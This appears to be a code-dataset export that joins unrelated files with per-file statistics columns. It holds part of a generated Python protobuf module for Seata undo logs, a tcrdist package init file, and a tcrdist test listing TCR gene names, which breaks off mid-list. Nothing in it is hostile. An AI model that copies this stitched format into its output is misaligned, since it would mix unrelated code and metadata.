number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.type', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='index_type', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.index_type', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='asc_or_desc', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.asc_or_desc', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cardinality', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.cardinality', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ordinal_position', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.ordinal_position', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1463,
serialized_end=1708,
)
_ROW = _descriptor.Descriptor(
name='Row',
full_name='seata.rm.datasource.undo.parser.proto.Row',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='fields', full_name='seata.rm.datasource.undo.parser.proto.Row.fields', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1710,
serialized_end=1777,
)
_FIELD = _descriptor.Descriptor(
name='Field',
full_name='seata.rm.datasource.undo.parser.proto.Field',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='seata.rm.datasource.undo.parser.proto.Field.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='key_type', full_name='seata.rm.datasource.undo.parser.proto.Field.key_type', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='seata.rm.datasource.undo.parser.proto.Field.type', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='seata.rm.datasource.undo.parser.proto.Field.value', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1779,
serialized_end=1847,
)
_BRANCHUNDOLOG.fields_by_name['sql_undo_logs'].message_type = _SQLUNDOLOG
_BRANCHUNDOLOG.oneofs_by_name['_xid'].fields.append(
_BRANCHUNDOLOG.fields_by_name['xid'])
_BRANCHUNDOLOG.fields_by_name['xid'].containing_oneof = _BRANCHUNDOLOG.oneofs_by_name['_xid']
_BRANCHUNDOLOG.oneofs_by_name['_branch_id'].fields.append(
_BRANCHUNDOLOG.fields_by_name['branch_id'])
_BRANCHUNDOLOG.fields_by_name['branch_id'].containing_oneof = _BRANCHUNDOLOG.oneofs_by_name['_branch_id']
_SQLUNDOLOG.fields_by_name['before_image'].message_type = _TABLERECORDS
_SQLUNDOLOG.fields_by_name['after_image'].message_type = _TABLERECORDS
_TABLERECORDS.fields_by_name['table_meta'].message_type = _TABLEMETA
_TABLERECORDS.fields_by_name['rows'].message_type = _ROW
_TABLEMETA_ALLCOLUMNSENTRY.fields_by_name['value'].message_type = _COLUMNMETA
_TABLEMETA_ALLCOLUMNSENTRY.containing_type = _TABLEMETA
_TABLEMETA_ALLINDEXSENTRY.fields_by_name['value'].message_type = _INDEXMETA
_TABLEMETA_ALLINDEXSENTRY.containing_type = _TABLEMETA
_TABLEMETA.fields_by_name['all_columns'].message_type = _TABLEMETA_ALLCOLUMNSENTRY
_TABLEMETA.fields_by_name['all_indexs'].message_type = _TABLEMETA_ALLINDEXSENTRY
_COLUMNMETA.fields_by_name['char_octet_length'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_INDEXMETA.fields_by_name['values'].message_type = _COLUMNMETA
_ROW.fields_by_name['fields'].message_type = _FIELD
DESCRIPTOR.message_types_by_name['BranchUndoLog'] = _BRANCHUNDOLOG
DESCRIPTOR.message_types_by_name['SQLUndoLog'] = _SQLUNDOLOG
DESCRIPTOR.message_types_by_name['TableRecords'] = _TABLERECORDS
DESCRIPTOR.message_types_by_name['TableMeta'] = _TABLEMETA
DESCRIPTOR.message_types_by_name['ColumnMeta'] = _COLUMNMETA
DESCRIPTOR.message_types_by_name['IndexMeta'] = _INDEXMETA
DESCRIPTOR.message_types_by_name['Row'] = _ROW
DESCRIPTOR.message_types_by_name['Field'] = _FIELD
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
BranchUndoLog = _reflection.GeneratedProtocolMessageType('BranchUndoLog', (_message.Message,), {
'DESCRIPTOR' : _BRANCHUNDOLOG,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.BranchUndoLog)
})
_sym_db.RegisterMessage(BranchUndoLog)
SQLUndoLog = _reflection.GeneratedProtocolMessageType('SQLUndoLog', (_message.Message,), {
'DESCRIPTOR' : _SQLUNDOLOG,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.SQLUndoLog)
})
_sym_db.RegisterMessage(SQLUndoLog)
TableRecords = _reflection.GeneratedProtocolMessageType('TableRecords', (_message.Message,), {
'DESCRIPTOR' : _TABLERECORDS,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableRecords)
})
_sym_db.RegisterMessage(TableRecords)
TableMeta = _reflection.GeneratedProtocolMessageType('TableMeta', (_message.Message,), {
'AllColumnsEntry' : _reflection.GeneratedProtocolMessageType('AllColumnsEntry', (_message.Message,), {
'DESCRIPTOR' : _TABLEMETA_ALLCOLUMNSENTRY,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry)
})
,
'AllIndexsEntry' : _reflection.GeneratedProtocolMessageType('AllIndexsEntry', (_message.Message,), {
'DESCRIPTOR' : _TABLEMETA_ALLINDEXSENTRY,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry)
})
,
'DESCRIPTOR' : _TABLEMETA,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableMeta)
})
_sym_db.RegisterMessage(TableMeta)
_sym_db.RegisterMessage(TableMeta.AllColumnsEntry)
_sym_db.RegisterMessage(TableMeta.AllIndexsEntry)
ColumnMeta = _reflection.GeneratedProtocolMessageType('ColumnMeta', (_message.Message,), {
'DESCRIPTOR' : _COLUMNMETA,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.ColumnMeta)
})
_sym_db.RegisterMessage(ColumnMeta)
IndexMeta = _reflection.GeneratedProtocolMessageType('IndexMeta', (_message.Message,), {
'DESCRIPTOR' : _INDEXMETA,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.IndexMeta)
})
_sym_db.RegisterMessage(IndexMeta)
Row = _reflection.GeneratedProtocolMessageType('Row', (_message.Message,), {
'DESCRIPTOR' : _ROW,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.Row)
})
_sym_db.RegisterMessage(Row)
Field = _reflection.GeneratedProtocolMessageType('Field', (_message.Message,), {
'DESCRIPTOR' : _FIELD,
'__module__' : 'branch_undolog_pb2'
# @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.Field)
})
_sym_db.RegisterMessage(Field)
_TABLEMETA_ALLCOLUMNSENTRY._options = None
_TABLEMETA_ALLINDEXSENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 49.09375
| 3,125
| 0.758171
| 4,824
| 36,133
| 5.368988
| 0.060116
| 0.049112
| 0.074093
| 0.068108
| 0.801544
| 0.773436
| 0.752471
| 0.741583
| 0.737876
| 0.690386
| 0
| 0.035608
| 0.114743
| 36,133
| 735
| 3,126
| 49.160544
| 0.774096
| 0.030526
| 0
| 0.69163
| 1
| 0.001468
| 0.234504
| 0.188803
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007342
| 0
| 0.007342
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6c42c2c0a7288c83cc99bb0c3154a109fa8ad3e5
| 128
|
py
|
Python
|
figpptx/converters/__init__.py
|
Sillte/figpptx
|
bf5539b09eeef4e6a17bb4483f62f29d286138b2
|
[
"MIT"
] | null | null | null |
figpptx/converters/__init__.py
|
Sillte/figpptx
|
bf5539b09eeef4e6a17bb4483f62f29d286138b2
|
[
"MIT"
] | null | null | null |
figpptx/converters/__init__.py
|
Sillte/figpptx
|
bf5539b09eeef4e6a17bb4483f62f29d286138b2
|
[
"MIT"
] | null | null | null |
""" You have to clarify import here.
"""
from . import line2d # NOQA
from . import fancybox # NOQA
from . import text # NOQA
| 21.333333
| 36
| 0.671875
| 18
| 128
| 4.777778
| 0.611111
| 0.348837
| 0.325581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010101
| 0.226563
| 128
| 5
| 37
| 25.6
| 0.858586
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
66b04af9bd9204478a87cb60ecd32f64c786676b
| 23,340
|
py
|
Python
|
tcrdist/tests/test_reverse_translate.py
|
agartland/tcrdist2
|
77ab0036a3f8f3951093a3bb14741d961ae14eda
|
[
"MIT"
] | 14
|
2019-07-16T22:49:20.000Z
|
2022-02-03T00:05:38.000Z
|
tcrdist/tests/test_reverse_translate.py
|
agartland/tcrdist2
|
77ab0036a3f8f3951093a3bb14741d961ae14eda
|
[
"MIT"
] | 20
|
2019-08-02T14:47:20.000Z
|
2020-06-29T15:09:18.000Z
|
tcrdist/tests/test_reverse_translate.py
|
agartland/tcrdist2
|
77ab0036a3f8f3951093a3bb14741d961ae14eda
|
[
"MIT"
] | 5
|
2019-06-07T21:04:54.000Z
|
2021-04-15T04:28:00.000Z
|
import pytest
from tcrdist.reverse_translate import TCRcodon
from tcrdist.tests.my_test_subset import clone_df_subset
import numpy as np
import pandas as pd
def test_TCRcodon_mouse_ab_init():
tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
assert set(tc.all_genes.keys()) == set(['TRAV1*01', 'TRAV1*02', 'TRAV10*01', 'TRAV10*02', 'TRAV10*03', 'TRAV10*04', 'TRAV10*05', 'TRAV10D*01', 'TRAV10D*02', 'TRAV10N*01', 'TRAV11*01', 'TRAV11*02', 'TRAV11D*01', 'TRAV11N*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-1*03', 'TRAV12-1*04', 'TRAV12-1*05', 'TRAV12-2*01', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV12-3*03', 'TRAV12-3*04', 'TRAV12D-1*01', 'TRAV12D-1*02', 'TRAV12D-1*03', 'TRAV12D-1*04', 'TRAV12D-1*05', 'TRAV12D-2*01', 'TRAV12D-2*02', 'TRAV12D-2*03', 'TRAV12D-2*04', 'TRAV12D-2*05', 'TRAV12D-3*01', 'TRAV12D-3*02', 'TRAV12D-3*03', 'TRAV12N-1*01', 'TRAV12N-2*01', 'TRAV12N-3*01', 'TRAV13-1*01', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV13-3*01', 'TRAV13-3*02', 'TRAV13-4/DV7*01', 'TRAV13-4/DV7*02', 'TRAV13-4/DV7*03', 'TRAV13-5*01', 'TRAV13D-1*01', 'TRAV13D-1*02', 'TRAV13D-1*03', 'TRAV13D-2*01', 'TRAV13D-2*02', 'TRAV13D-3*01', 'TRAV13D-3*02', 'TRAV13D-4*01', 'TRAV13D-4*02', 'TRAV13D-4*03', 'TRAV13N-1*01', 'TRAV13N-2*01', 'TRAV13N-3*01', 'TRAV13N-4*01', 'TRAV14-1*01', 'TRAV14-1*02', 'TRAV14-1*03', 'TRAV14-2*01', 'TRAV14-2*02', 'TRAV14-2*03', 'TRAV14-3*01', 'TRAV14-3*02', 'TRAV14-3*03', 'TRAV14D-1*01', 'TRAV14D-1*02', 'TRAV14D-2*01', 'TRAV14D-2*02', 'TRAV14D-2*03', 'TRAV14D-3/DV8*01', 'TRAV14D-3/DV8*02', 'TRAV14D-3/DV8*03', 'TRAV14D-3/DV8*04', 'TRAV14D-3/DV8*05', 'TRAV14D-3/DV8*06', 'TRAV14D-3/DV8*07', 'TRAV14D-3/DV8*08', 'TRAV14N-1*01', 'TRAV14N-2*01', 'TRAV14N-3*01', 'TRAV15-1/DV6-1*01', 'TRAV15-1/DV6-1*02', 'TRAV15-2/DV6-2*01', 'TRAV15-2/DV6-2*02', 'TRAV15D-1/DV6D-1*01', 'TRAV15D-1/DV6D-1*02', 'TRAV15D-1/DV6D-1*03', 'TRAV15D-1/DV6D-1*04', 'TRAV15D-1/DV6D-1*05', 'TRAV15D-1/DV6D-1*06', 'TRAV15D-2/DV6D-2*01', 'TRAV15D-2/DV6D-2*02', 'TRAV15D-2/DV6D-2*03', 'TRAV15D-2/DV6D-2*04', 'TRAV15D-2/DV6D-2*05', 'TRAV15N-1*01', 'TRAV15N-2*01', 'TRAV16*01', 'TRAV16*02', 'TRAV16*03', 'TRAV16*04', 'TRAV16*05', 'TRAV16D/DV11*01', 'TRAV16D/DV11*02', 'TRAV16D/DV11*03', 'TRAV16N*01', 'TRAV17*01', 'TRAV17*02', 'TRAV18*01', 'TRAV19*01', 'TRAV19*03', 'TRAV2*01', 'TRAV20*01', 'TRAV20*02', 'TRAV21/DV12*01', 'TRAV21/DV12*02', 'TRAV3-1*01', 'TRAV3-1*02', 'TRAV3-3*01', 'TRAV3-4*01', 'TRAV3D-3*01', 'TRAV3D-3*02', 'TRAV3N-3*01', 'TRAV4-2*01', 'TRAV4-2*02', 'TRAV4-3*01', 'TRAV4-3*02', 'TRAV4-4/DV10*01', 'TRAV4D-2*01', 'TRAV4D-3*01', 'TRAV4D-3*02', 'TRAV4D-3*03', 'TRAV4D-3*04', 'TRAV4D-4*01', 'TRAV4D-4*02', 'TRAV4D-4*03', 'TRAV4D-4*04', 'TRAV4N-3*01', 'TRAV4N-4*01', 'TRAV5-1*01', 'TRAV5-2*01', 'TRAV5-4*01', 'TRAV5D-2*01', 'TRAV5D-4*01', 'TRAV5D-4*02', 'TRAV5D-4*03', 'TRAV5D-4*04', 'TRAV5D-4*05', 'TRAV5N-2*01', 'TRAV5N-4*01', 'TRAV6-1*01', 'TRAV6-1*02', 'TRAV6-2*01', 'TRAV6-2*02', 'TRAV6-2*03', 'TRAV6-3*01', 'TRAV6-3*02', 'TRAV6-4*01', 'TRAV6-4*02', 'TRAV6-4*03', 'TRAV6-5*01', 'TRAV6-5*02', 'TRAV6-5*03', 'TRAV6-5*04', 'TRAV6-6*01', 'TRAV6-6*02', 'TRAV6-6*03', 'TRAV6-7/DV9*01', 'TRAV6-7/DV9*02', 'TRAV6-7/DV9*03', 'TRAV6-7/DV9*04', 'TRAV6-7/DV9*06', 'TRAV6-7/DV9*07', 'TRAV6-7/DV9*08', 'TRAV6D-3*01', 'TRAV6D-3*02', 'TRAV6D-4*01', 'TRAV6D-5*01', 'TRAV6D-6*01', 'TRAV6D-6*02', 'TRAV6D-6*03', 'TRAV6D-6*04', 'TRAV6D-6*05', 'TRAV6D-7*01', 'TRAV6D-7*02', 'TRAV6D-7*03', 'TRAV6D-7*04', 'TRAV6N-5*01', 'TRAV6N-6*01', 'TRAV6N-7*01', 'TRAV7-1*01', 'TRAV7-2*01', 'TRAV7-2*02', 'TRAV7-3*01', 'TRAV7-3*02', 'TRAV7-3*03', 'TRAV7-3*04', 'TRAV7-4*01', 'TRAV7-4*02', 'TRAV7-5*01', 'TRAV7-5*02', 'TRAV7-5*03', 'TRAV7-6*01', 'TRAV7-6*02', 'TRAV7D-2*01', 'TRAV7D-2*02', 'TRAV7D-2*03', 'TRAV7D-3*01', 'TRAV7D-3*02', 'TRAV7D-4*01', 'TRAV7D-4*02', 'TRAV7D-4*03', 'TRAV7D-5*01', 'TRAV7D-6*01', 'TRAV7D-6*02', 'TRAV7N-4*01', 'TRAV7N-5*01', 'TRAV7N-6*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-1*03', 'TRAV8-2*01', 'TRAV8D-1*01', 'TRAV8D-1*02', 'TRAV8D-2*01', 'TRAV8D-2*02', 'TRAV8D-2*03', 'TRAV8N-2*01', 'TRAV9-1*01', 'TRAV9-1*02', 'TRAV9-2*01', 'TRAV9-3*01', 'TRAV9-3*02', 'TRAV9-3*03', 'TRAV9-4*01', 'TRAV9D-1*01', 'TRAV9D-1*02', 'TRAV9D-2*01', 'TRAV9D-2*02', 'TRAV9D-2*03', 'TRAV9D-3*01', 'TRAV9D-3*02', 'TRAV9D-4*01', 'TRAV9D-4*03', 'TRAV9D-4*04', 'TRAV9N-2*01', 'TRAV9N-3*01', 'TRAV9N-4*01', 'TRAJ11*01', 'TRAJ12*01', 'TRAJ13*01', 'TRAJ15*01', 'TRAJ16*01', 'TRAJ17*01', 'TRAJ18*01', 'TRAJ19*01', 'TRAJ2*01', 'TRAJ2*02', 'TRAJ20*01', 'TRAJ21*01', 'TRAJ21*02', 'TRAJ22*01', 'TRAJ23*01', 'TRAJ24*01', 'TRAJ25*01', 'TRAJ26*01', 'TRAJ27*01', 'TRAJ28*01', 'TRAJ29*01', 'TRAJ3*01', 'TRAJ30*01', 'TRAJ31*01', 'TRAJ31*02', 'TRAJ32*01', 'TRAJ32*02', 'TRAJ33*01', 'TRAJ34*01', 'TRAJ34*02', 'TRAJ35*01', 'TRAJ35*02', 'TRAJ36*01', 'TRAJ37*01', 'TRAJ38*01', 'TRAJ39*01', 'TRAJ4*01', 'TRAJ40*01', 'TRAJ41*01', 'TRAJ42*01', 'TRAJ42*02', 'TRAJ43*01', 'TRAJ43*02', 'TRAJ44*01', 'TRAJ45*01', 'TRAJ45*02', 'TRAJ46*01', 'TRAJ47*01', 'TRAJ48*01', 'TRAJ49*01', 'TRAJ5*01', 'TRAJ50*01', 'TRAJ52*01', 'TRAJ53*01', 'TRAJ54*01', 'TRAJ56*01', 'TRAJ57*01', 'TRAJ58*01', 'TRAJ59*01', 'TRAJ6*01', 'TRAJ60*01', 'TRAJ61*01', 'TRAJ7*01', 'TRAJ9*01', 'TRAJ9*02', 'TRBV1*01', 'TRBV1*02', 'TRBV10*01', 'TRBV12-1*01', 'TRBV12-1*02', 'TRBV12-2*01', 'TRBV12-2*02', 'TRBV13-1*01', 'TRBV13-1*02', 'TRBV13-2*01', 'TRBV13-2*02', 'TRBV13-2*03', 'TRBV13-2*04', 'TRBV13-2*05', 'TRBV13-3*01', 'TRBV14*01', 'TRBV15*01', 'TRBV16*01', 'TRBV16*02', 'TRBV16*03', 'TRBV16*04', 'TRBV17*01', 'TRBV19*01', 'TRBV19*02', 'TRBV19*03', 'TRBV2*01', 'TRBV20*01', 'TRBV20*02', 'TRBV21*01', 'TRBV23*01', 'TRBV24*01', 'TRBV24*02', 'TRBV24*03', 'TRBV24*04', 'TRBV26*01', 'TRBV26*02', 'TRBV29*01', 'TRBV29*02', 'TRBV3*01', 'TRBV3*02', 'TRBV30*01', 'TRBV31*01', 'TRBV31*02', 'TRBV4*01', 'TRBV4*02', 'TRBV5*01', 'TRBV5*02', 'TRBV5*03', 'TRBV5*04', 'TRBV5*05', 'TRBV8*01', 'TRBV9*01', 'TRBJ1-1*01', 'TRBJ1-1*02', 'TRBJ1-2*01', 'TRBJ1-3*01', 'TRBJ1-4*01', 'TRBJ1-4*02', 'TRBJ1-5*01', 'TRBJ1-5*02', 'TRBJ1-5*03', 'TRBJ1-6*01', 'TRBJ1-7*01', 'TRBJ2-1*01', 'TRBJ2-2*01', 'TRBJ2-3*01', 'TRBJ2-4*01', 'TRBJ2-5*01', 'TRBJ2-6*01', 'TRBJ2-7*01', 'TRBJ2-7*02', 'TRBD1*01', 'TRBD2*01'])
def test_TCRcodon_human_ab_init():
tc = TCRcodon(organism = "human", db_file = "alphabeta_db.tsv")
assert set(tc.all_genes.keys()) == set(['TRAV1-1*01', 'TRAV1-1*02', 'TRAV1-2*01', 'TRAV1-2*02', 'TRAV10*01', 'TRAV11*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-2*01', 'TRAV12-2*02', 'TRAV12-2*03', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV13-1*01', 'TRAV13-1*02', 'TRAV13-1*03', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV14/DV4*01', 'TRAV14/DV4*02', 'TRAV14/DV4*03', 'TRAV14/DV4*04', 'TRAV16*01', 'TRAV17*01', 'TRAV18*01', 'TRAV19*01', 'TRAV2*01', 'TRAV2*02', 'TRAV20*01', 'TRAV20*02', 'TRAV20*03', 'TRAV20*04', 'TRAV21*01', 'TRAV21*02', 'TRAV22*01', 'TRAV23/DV6*01', 'TRAV23/DV6*02', 'TRAV23/DV6*03', 'TRAV23/DV6*04', 'TRAV24*01', 'TRAV24*02', 'TRAV25*01', 'TRAV26-1*01', 'TRAV26-1*02', 'TRAV26-1*03', 'TRAV26-2*01', 'TRAV26-2*02', 'TRAV27*01', 'TRAV27*02', 'TRAV27*03', 'TRAV29/DV5*01', 'TRAV29/DV5*02', 'TRAV3*01', 'TRAV30*01', 'TRAV30*02', 'TRAV30*03', 'TRAV30*04', 'TRAV34*01', 'TRAV35*01', 'TRAV35*02', 'TRAV36/DV7*01', 'TRAV36/DV7*02', 'TRAV36/DV7*03', 'TRAV36/DV7*04', 'TRAV38-1*01', 'TRAV38-1*02', 'TRAV38-1*03', 'TRAV38-1*04', 'TRAV38-2/DV8*01', 'TRAV39*01', 'TRAV4*01', 'TRAV40*01', 'TRAV41*01', 'TRAV5*01', 'TRAV6*01', 'TRAV6*02', 'TRAV6*03', 'TRAV6*04', 'TRAV6*05', 'TRAV6*06', 'TRAV7*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-2*01', 'TRAV8-2*02', 'TRAV8-3*01', 'TRAV8-3*02', 'TRAV8-3*03', 'TRAV8-4*01', 'TRAV8-4*02', 'TRAV8-4*03', 'TRAV8-4*04', 'TRAV8-4*05', 'TRAV8-4*06', 'TRAV8-4*07', 'TRAV8-6*01', 'TRAV8-6*02', 'TRAV8-7*01', 'TRAV9-1*01', 'TRAV9-2*01', 'TRAV9-2*02', 'TRAV9-2*03', 'TRAV9-2*04', 'TRAJ1*01', 'TRAJ10*01', 'TRAJ11*01', 'TRAJ12*01', 'TRAJ13*01', 'TRAJ13*02', 'TRAJ14*01', 'TRAJ15*01', 'TRAJ15*02', 'TRAJ16*01', 'TRAJ17*01', 'TRAJ18*01', 'TRAJ19*01', 'TRAJ2*01', 'TRAJ20*01', 'TRAJ21*01', 'TRAJ22*01', 'TRAJ23*01', 'TRAJ23*02', 'TRAJ24*01', 'TRAJ24*02', 'TRAJ25*01', 'TRAJ26*01', 'TRAJ27*01', 'TRAJ28*01', 'TRAJ29*01', 'TRAJ3*01', 'TRAJ30*01', 'TRAJ31*01', 'TRAJ32*01', 'TRAJ32*02', 'TRAJ33*01', 'TRAJ34*01', 'TRAJ35*01', 'TRAJ36*01', 'TRAJ37*01', 'TRAJ37*02', 'TRAJ38*01', 'TRAJ39*01', 'TRAJ4*01', 'TRAJ40*01', 'TRAJ41*01', 'TRAJ42*01', 'TRAJ43*01', 'TRAJ44*01', 'TRAJ45*01', 'TRAJ46*01', 'TRAJ47*01', 'TRAJ47*02', 'TRAJ48*01', 'TRAJ49*01', 'TRAJ5*01', 'TRAJ50*01', 'TRAJ51*01', 'TRAJ52*01', 'TRAJ53*01', 'TRAJ54*01', 'TRAJ55*01', 'TRAJ56*01', 'TRAJ57*01', 'TRAJ58*01', 'TRAJ59*01', 'TRAJ6*01', 'TRAJ60*01', 'TRAJ61*01', 'TRAJ7*01', 'TRAJ8*01', 'TRAJ9*01', 'TRBV1*01', 'TRBV10-1*01', 'TRBV10-1*02', 'TRBV10-2*01', 'TRBV10-2*02', 'TRBV10-3*01', 'TRBV10-3*02', 'TRBV10-3*03', 'TRBV10-3*04', 'TRBV11-1*01', 'TRBV11-2*01', 'TRBV11-2*02', 'TRBV11-2*03', 'TRBV11-3*01', 'TRBV11-3*02', 'TRBV11-3*03', 'TRBV12-1*01', 'TRBV12-2*01', 'TRBV12-3*01', 'TRBV12-4*01', 'TRBV12-4*02', 'TRBV12-5*01', 'TRBV13*01', 'TRBV13*02', 'TRBV14*01', 'TRBV14*02', 'TRBV15*01', 'TRBV15*02', 'TRBV15*03', 'TRBV16*01', 'TRBV16*02', 'TRBV16*03', 'TRBV17*01', 'TRBV18*01', 'TRBV19*01', 'TRBV19*02', 'TRBV19*03', 'TRBV2*01', 'TRBV2*02', 'TRBV2*03', 'TRBV20-1*01', 'TRBV20-1*02', 'TRBV20-1*03', 'TRBV20-1*04', 'TRBV20-1*05', 'TRBV20-1*06', 'TRBV20-1*07', 'TRBV20/OR9-2*01', 'TRBV20/OR9-2*02', 'TRBV20/OR9-2*03', 'TRBV21-1*01', 'TRBV21/OR9-2*01', 'TRBV23-1*01', 'TRBV23/OR9-2*01', 'TRBV23/OR9-2*02', 'TRBV24-1*01', 'TRBV24/OR9-2*01', 'TRBV25-1*01', 'TRBV26*01', 'TRBV26/OR9-2*01', 'TRBV26/OR9-2*02', 'TRBV27*01', 'TRBV28*01', 'TRBV29-1*01', 'TRBV29-1*02', 'TRBV29-1*03', 'TRBV29/OR9-2*01', 'TRBV29/OR9-2*02', 'TRBV3-1*01', 'TRBV3-1*02', 'TRBV3-2*01', 'TRBV3-2*02', 'TRBV3-2*03', 'TRBV30*01', 'TRBV30*02', 'TRBV30*04', 'TRBV30*05', 'TRBV4-1*01', 'TRBV4-1*02', 'TRBV4-2*01', 'TRBV4-2*02', 'TRBV4-3*01', 'TRBV4-3*02', 'TRBV4-3*03', 'TRBV4-3*04', 'TRBV5-1*01', 'TRBV5-1*02', 'TRBV5-3*01', 'TRBV5-3*02', 'TRBV5-4*01', 'TRBV5-4*02', 'TRBV5-4*03', 'TRBV5-4*04', 'TRBV5-5*01', 'TRBV5-5*02', 'TRBV5-5*03', 'TRBV5-6*01', 'TRBV5-7*01', 'TRBV5-8*01', 'TRBV5-8*02', 'TRBV6-1*01', 'TRBV6-2*01', 'TRBV6-3*01', 'TRBV6-4*01', 'TRBV6-4*02', 'TRBV6-5*01', 'TRBV6-6*01', 'TRBV6-6*02', 'TRBV6-6*03', 'TRBV6-6*04', 